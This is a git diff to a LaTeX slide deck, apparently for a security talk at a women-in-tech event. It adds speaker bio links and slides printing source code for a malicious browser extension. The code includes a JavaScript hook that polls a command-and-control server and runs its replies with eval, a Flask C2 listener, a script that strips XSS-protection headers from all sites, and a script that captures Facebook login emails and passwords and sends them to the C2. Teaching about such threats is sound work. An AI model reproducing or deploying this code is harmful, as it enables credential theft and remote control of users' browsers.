--- a/docs/presentation/girlspowertech/girlspowertech.tex
+++ b/docs/presentation/girlspowertech/girlspowertech.tex
@@ -105,7 +105,7 @@
     \end{column}
     \begin{column}{0.5\textwidth}
       \begin{center}
-        \begin{tcolorbox}[title=Biography,colback=gray]
+        \begin{tcolorbox}[title=\href{https://www.linkedin.com/in/xandria-richman-8b0153bb/}{Biography},colback=gray]
           \begin{itemize}
             {\color{black} \tiny
             \item Bachelor of Computer Science from UNB
@@ -129,7 +129,7 @@
     \end{column}
     \begin{column}{0.5\textwidth}
       \begin{center}
-        \begin{tcolorbox}[title=Biography,colback=gray]
+        \begin{tcolorbox}[title=\href{https://lillypad.github.io}{Biography},colback=gray]
           \begin{itemize}
             {\color{black} \tiny
             \item Studied Computer Science and Audio Engineering at Acadia University
@@ -322,10 +322,203 @@
   \end{center}
 \end{frame}
 
-\begin{frame}
-  \frametitle{Terminology}
-  \framesubtitle{Command \& Control Server}
+\begin{frame}[fragile]{}
+  \frametitle{The Code}
+  \framesubtitle{JavaScript CnC}
   \begin{center}
+    \begin{tcolorbox}[title=hook.js,colback=black]
+    \begin{minipage}{0.5\textwidth}
+      \begin{minted}[fontsize=\tiny]{javascript}
+        var config = {                                                                      //CnC server configuration
+          server: "127.0.0.1",                                                              //Our test CnC server
+          port: 80                                                                          //CnC port
+        };
+        function cnc(data, callback){                                                       //CnC Handler
+	      try{
+		    let http = new XMLHttpRequest();
+		    http.onreadystatechange = function(){
+		      if (this.readyState == 4 && this.status == 200){
+				callback(this.responseText);                                //Callback function
+				return true;
+			  }
+			  if (this.readyState == 4 && this.status != 200){
+				return false;                                               //Try to fail silently
+			  }
+		    };
+		    http.open('POST', 'http://' + config.server + ':' + config.port, true); //Connect to CnC server
+		    http.setRequestHeader('Content-Type', 'application/json');
+		    http.send(JSON.stringify(data));                                        //Send the data
+		    return true;
+	      } catch(error){
+		    return false;
+	      }
+        }
+      \end{minted}
+    \end{minipage}
+    \end{tcolorbox}
+  \end{center}
+\end{frame}
+
+\begin{frame}[fragile]{}
+  \frametitle{The Code}
+  \framesubtitle{Hooking the Browser}
+  \begin{center}
+    \begin{tcolorbox}[title=hook.js,colback=black]
+    \begin{minipage}{0.5\textwidth}
+      \begin{minted}[fontsize=\tiny]{javascript}
+        function sleep(ms) {
+	      try {
+		    return new Promise(resolve => setTimeout(resolve, ms));
+	      } catch(error){
+		    return false;
+	      }
+        }
+
+        async function hook(){                   //Async hook to run in background in loop
+          try {
+            let data = {};                       //Any data you like here
+            for (;;){
+              cnc(data, function(responseText){
+                eval(responseText);              //Execute the command sent back by CnC server
+                return true;
+              });
+              await sleep(10000);                //Sleep for 10s
+            }
+          } catch(error){
+            return false;
+          }
+        }
+        
+        hook();
+      \end{minted}
+    \end{minipage}
+    \end{tcolorbox}
+  \end{center}
+\end{frame}
+
+\begin{frame}[fragile]{}
+  \frametitle{The Code}
+  \framesubtitle{The CnC Server}
+  \begin{center}
+    \begin{tcolorbox}[title=server.py,colback=black]
+    \begin{minipage}{0.5\textwidth}
+      \begin{minted}[fontsize=\tiny]{python}
+        #!/usr/bin/env python
+        
+        import sys
+        import json
+        from flask import Flask
+        from flask import request
+
+        @app.route("/", methods=["POST"])
+        def cnc_listener():
+            try:
+                data = request.json
+                print(json.dumps(data, indent=4))
+                if 'bot' in data:
+                    return "console.log('1337 botnet dude')"
+                return json.dumps(
+                    data,
+                    indent=4
+                ), 200, {'Content-Type': 'application/json'}
+            except Exception as e:
+                return json.dumps(
+                    {
+                      'error': 'invalid request'
+                    },
+                    indent=4), 500, {'Content-Type': 'application/json'}
+      \end{minted}
+    \end{minipage}
+    \end{tcolorbox}
+  \end{center}
+\end{frame}
+
+\begin{frame}[fragile]{}
+  \frametitle{The Code}
+  \framesubtitle{Killing Security Headers}
+  \begin{center}
+    \begin{tcolorbox}[title=background.js,colback=black]
+    \begin{minipage}{0.5\textwidth}
+      \begin{minted}[fontsize=\tiny]{javascript}
+        function removeMatchingHeaders(headers, regex, callback){
+          for (let i = 0; i < headers.length; i++){
+            if (headers[i].name.match(regex)){
+              headers.splice(i, 1);
+              callback(headers);
+              return true;
+            }
+          }
+          return false;
+        }
+        function remove_security_headers(details){
+          removeMatchingHeaders(
+            details.responseHeaders,
+            /x-xss-protection/i,
+            function(headers){
+              return true;
+            }
+          );
+        }
+        chrome.webRequest.onHeadersReceived.addListenter(
+          remove_security_headers,
+          {urls: ['*://*/*']},
+          ['blocking', 'responseHeaders']
+        );
+      \end{minted}
+    \end{minipage}
+    \end{tcolorbox}
+  \end{center}
+\end{frame}
+
+\begin{frame}[fragile]{}
+  \frametitle{The Code}
+  \framesubtitle{Stealing Facebook Credentials}
+  \begin{center}
+    \begin{tcolorbox}[title=facebook.js,colback=black]
+    \begin{minipage}{0.5\textwidth}
+      \begin{minted}[fontsize=\tiny]{javascript}
+        document.getElementById('loginbutton').getElementsByTagName('input')[0].addEventListener('click',function(){
+		  try {
+			let email = document.getElementById('email'); //Get Email Address Element
+			let pass = document.getElementById('pass');   //Get Password Element
+			if (email.value != '' && pass.value != ''){   //Check if data was entered in login fields
+                          let data = {                                //Capture timestamp, site, user and pass
+				"auth": {
+				  timestamp: Date.now(),
+				  site: "facebook.com",
+				  user: email.value,
+				  pass: pass.value
+				}
+			  };
+			  cnc(data, function(data){                  //Send the data to to CnC server
+				return true;
+			  });
+                          return true;
+                       }
+	               return false;
+		  } catch(error){
+			return false;                                //Try to fail silently
+		  }
+	    });
+      \end{minted}
+    \end{minipage}
+    \end{tcolorbox}
+  \end{center}
+\end{frame}
+
+\begin{frame}
+  \frametitle{Demo}
+  \framesubtitle{Pray to the Demo Gods!}
+  \begin{center}
+    \includegraphics[scale=0.5]{demogods}
+  \end{center}
+\end{frame}
+
+\begin{frame}
+  \frametitle{Questions?}
+  \framesubtitle{No such thing as a silly question!}
+  \begin{center}
+    \includegraphics[scale=0.4]{questions}
   \end{center}
 \end{frame}
 
